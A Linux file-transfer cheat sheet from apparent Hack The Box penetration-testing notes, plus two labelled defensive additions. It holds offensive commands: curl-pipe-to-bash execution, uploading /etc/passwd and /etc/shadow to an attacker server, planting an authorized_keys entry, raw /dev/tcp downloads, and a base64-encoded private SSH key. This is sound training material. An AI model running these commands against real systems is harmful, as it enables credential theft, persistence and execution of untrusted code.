# Transferring Files - Linux

### Base64 Encoding/Decoding <a href="#web-servers" id="web-servers"></a>

**Pwnbox - Check File MD5 hash**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```

**Pwnbox - Encode SSH Key to Base64**

```shell-session
$ cat id_rsa |base64 -w 0;echo

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
```

**Linux - Decode the File**

```shell-session
$ echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa
```

**Linux - Confirm the MD5 Hashes Match**

```shell-session
$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```
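The encode, paste, decode and compare steps above can be wrapped into one check. This is an added example, not part of the original notes: it uses `sha256sum` instead of `md5sum` (MD5 catches accidental corruption but is not collision-resistant), and the function name `decode_and_verify` and the sample file content are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not from the original notes. Sample file content is constructed.

# Decode pasted base64 text ($1) into a file ($2) and compare it with the
# SHA-256 digest recorded on the sending side ($3).
# Returns 0 = verified, 1 = decoded but digest differs, 2 = not valid base64.
decode_and_verify() {
  b64_text=$1 out_file=$2 expected=$3
  # Terminals and chat tools often insert spaces or line breaks into a paste.
  if ! printf '%s' "$b64_text" | tr -d ' \t\r\n' | base64 -d > "$out_file" 2>/dev/null
  then
    rm -f "$out_file"; return 2
  fi
  actual=$(sha256sum "$out_file" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    rm -f "$out_file"; return 1   # never leave an unverified file behind
  fi
  return 0
}

# Sending side: record the digest, then encode on a single line.
work=$(mktemp -d)
printf 'constructed sample payload\nline two\n' > "$work/original"
digest=$(sha256sum "$work/original" | cut -d' ' -f1)
encoded=$(base64 -w 0 "$work/original")

# Receiving side: an intact paste verifies; one that lost its last four
# characters still decodes cleanly and is caught only by the digest check.
decode_and_verify "$encoded" "$work/copy" "$digest" \
  && echo "intact paste: verified" || echo "intact paste: rejected ($?)"
decode_and_verify "${encoded%????}" "$work/copy" "$digest" \
  && echo "truncated paste: verified" || echo "truncated paste: rejected ($?)"
rm -rf "$work"
```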

### Fileless Attacks Using Linux

**Fileless Download with cURL**

```shell-session
$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
```

**Fileless Download with wget**

```shell-session
$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Hello World!
```

### Web servers

`python3 -m http.server 8000` Start a local webserver

`wget http://10.10.14.1:8000/linpeas.sh` Download a file on the remote server from our local machine

`curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` Download a file on the remote server from our local machine

### Netcat <a href="#netcat" id="netcat"></a>

Netcat is a good way to transfer files if you do not have an interactive shell.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
nc 192.168.1.102 4444 > file
```

I have sometimes received this error:

```
This is nc from the netcat-openbsd package. An alternative nc is available
```

I have just run this command instead:

```
nc -l 1234 > file.sh
```

### With php <a href="#with-php" id="with-php"></a>

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### Ftp <a href="#ftp" id="ftp"></a>

If you have access to an FTP client, you can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted.

### Tftp <a href="#tftp" id="tftp"></a>

To use Tftp to transfer the file, run it interactively like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If that does not work, try this:

```
tftp 192.168.0.101 <<< "get shell5555.php shell5555.php"
```

#### SSH - SCP <a href="#ssh---scp" id="ssh---scp"></a>

If you are able to connect to a target through SSH, you can use this to transfer files.

So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`. Then you need to do two things.

1. Create a new keypair

You do that with:

```
ssh-keygen -t rsa -C "your_email@example.com"
```

Then you enter a name for the key at the prompts:

```
Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
```

This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey.pub`. The one ending in `.pub` is your public key, and the other is your private key.

2. Add your public key to authorized\_keys.

Now you copy the content of `nameOfMyKey.pub`. On the compromised machine you go to `~/.ssh` and append the public key to the file `authorized_keys`, like this:

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." >> authorized_keys
```

3. Log in.

Now you should be all set to log in using your private key, like this:

```
ssh -i nameOfMyKey kim@192.168.1.103
```

#### SCP <a href="#scp" id="scp"></a>

Now we can copy files to a machine using `scp`

```
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```

### SSH (HTB notes)

**Enabling the SSH Server**

```shell-session
$ sudo systemctl enable ssh
```

**Starting the SSH Server**

```shell-session
$ sudo systemctl start ssh
```

**Checking for SSH Listening Port**

```shell-session
$ netstat -lnpt
```

**Linux - Downloading Files Using SCP**

```shell-session
$ scp plaintext@192.168.49.128:/root/myroot.txt . 
```

### Download with Bash (/dev/tcp)

**Connect to the Target Webserver**

```shell-session
$ exec 3<>/dev/tcp/10.10.10.32/80
```

**HTTP GET Request**

```shell-session
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

**Print the Response**

```shell-session
$ cat <&3
```
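The `curl | bash` and `wget | python3` one-liners in the Fileless Attacks section and the `/dev/tcp` socket above write nothing to disk, which makes process command-line telemetry a natural place to look for them. The following is an added example, not part of the original notes: the log format (`<user> <command line>`), the sample records and the rule names are all constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): flag download-and-execute
# command lines. SAMPLE_LOG is constructed; format is "<user> <command line>".
SAMPLE_LOG='alice curl https://example.test/install.sh | bash
bob wget -qO- https://example.test/helloworld.py | python3
carol curl -sSL https://example.test/archive.tgz -o /tmp/archive.tgz
dave exec 3<>/dev/tcp/192.0.2.10/80
erin wget https://example.test/notes.txt
frank curl -s https://example.test/data.json | jq .'

# curl/wget whose output is piped directly into a shell or script interpreter.
PIPE_RE='(^|[[:space:]])(curl|wget)[[:space:]][^|]*[|][[:space:]]*(sudo[[:space:]]+)?(sh|bash|zsh|dash|python[0-9.]*|perl|ruby|php)([[:space:]]|$)'
# Bash pseudo-device used to open raw TCP/UDP sockets without a client binary.
DEVTCP_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Reads "<user> <command line>" records on stdin and prints one
# tab-separated finding per match: rule, user, command line.
detect_fileless() {
  while read -r user cmd; do
    if printf '%s\n' "$cmd" | grep -Eq "$PIPE_RE"; then
      printf 'pipe-to-interpreter\t%s\t%s\n' "$user" "$cmd"
    elif printf '%s\n' "$cmd" | grep -Eq "$DEVTCP_RE"; then
      printf 'dev-tcp-socket\t%s\t%s\n' "$user" "$cmd"
    fi
  done
}

printf '%s\n' "$SAMPLE_LOG" | detect_fileless
```

These are heuristics over a single command line: ordinary downloads to a file and pipes into non-interpreters such as `jq` are left alone, while multi-stage pipelines and process substitution would need additional rules.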

## Upload Operations

### Web Upload

**Pwnbox - Install the uploadserver Module**

```shell-session
$ sudo python3 -m pip install --user uploadserver
```

**Pwnbox - Create a Self-Signed Certificate**

```shell-session
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
```

**Pwnbox - Start Web Server**

```shell-session
$ mkdir https && cd https
```

```shell-session
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

**Linux - Upload Multiple Files**

```shell-session
$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

### Alternative Web File Transfer Method

**Linux - Creating a Web Server with Python3**

```shell-session
$ python3 -m http.server
```

**Linux - Creating a Web Server with Python2.7**

```shell-session
$ python2.7 -m SimpleHTTPServer
```

**Linux - Creating a Web Server with PHP**

```shell-session
$ php -S 0.0.0.0:8000
```

**Linux - Creating a Web Server with Ruby**

```shell-session
$ ruby -run -e httpd . -p8000
```

**Download the File from the Target Machine onto the Pwnbox**

```shell-session
$ wget 192.168.49.128:8000/filetotransfer.txt
```

### SCP Upload

```shell-session
$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```


